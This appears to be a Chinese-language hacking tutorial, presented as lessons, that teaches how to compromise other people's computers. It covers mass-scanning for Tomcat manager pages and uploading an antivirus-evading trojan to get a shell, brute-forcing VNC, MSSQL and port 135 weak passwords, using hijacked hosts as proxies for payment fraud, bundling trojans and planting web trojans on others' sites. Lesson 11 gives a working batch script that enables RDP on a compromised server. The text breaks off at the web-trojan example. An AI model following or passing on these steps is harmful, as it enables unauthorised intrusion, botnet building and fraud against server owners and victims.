网络攻防教程:从入门到精通
1.第一课 简单系统介绍 常见入侵端口:3389 4899 5900 1433 21 23 135 445 ----------------------------------------------------------------- 2.第二课: 80和8080端口拿服务器 step1:使用S扫描器,扫描8080或80端口,保存ip地址ips.txt。 step2:打开 Apache Tomcat Crack工具,-----“设置”-----“导入己扫IP”-----“点导入(ips.txt)”-----“开始” step3:寻找类似这样的url:http://ip:8080/manager/html 以下地址为路由器地址,无用。 url:http://ip:8080 step4:打开网址:http://ip:8080/manager/html,找到上传点,上传木马(webdax.war),木马上传成功即可获得shell.(木马须免杀) ----------------------------------------------------------------- 第3课:5900抓鸡(空口令,现在一般不会存在了) step1:s扫描器扫5900IP段 step2:打开5900扫描器,输入扫描段 step3:点“开始”,等待扫描结果,带有VULNERABLE字符的即可连接 ----------------------------------------------------------------- 第4课:刷钻教程 现在己无法刷钻, 原理:抓到肉鸡后,上传软件“路由器密码查看器”查看到密码,将肉鸡设为代理,此时操作自己的机器不是操作肉鸡的机器,然后登陆刷钻网站,通过宽带支付的方式支付QQ会员什么的。 ----------------------------------------------------------------- 第5课:1433抓鸡 原理:弱口令 ----------------------------------------------------------------- 第6课:135抓肉鸡 原理:弱口令 ----------------------------------------------------------------- 第7课:免杀环境搭建 就是虚拟机安装,杀毒软件安装 ----------------------------------------------------------------- 第8课:网吧上线教程 使用内网端口自动映射工具,也可以使用向日葵等工具。 ----------------------------------------------------------------- 第9课:刷钻,略 ----------------------------------------------------------------- 第10课:木马手工捆绑 ----------------------------------------------------------------- 第11课:给服务器开3389 可以上传一个批处理执行: ------------------------------------------------ echo Windows Registry Editor Version 5.00>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg echo "fDenyTSConnections"=dword:00000000>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg regedit /s 3389.reg del 3389.reg ------------------------------------------------ 第12课:网马介绍 略 ----------------------------------------------------------------- 第13课:网站挂马实例 ------------------------------------------------ 1.在自己网站挂马 2.在他人网站挂马 3.框架网马代码 例: